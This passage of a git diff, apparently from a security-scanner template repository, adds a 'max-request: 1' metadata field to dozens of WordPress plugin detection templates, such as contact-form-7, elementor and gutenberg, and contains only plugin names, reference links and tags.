https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..b9de0ee313 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git 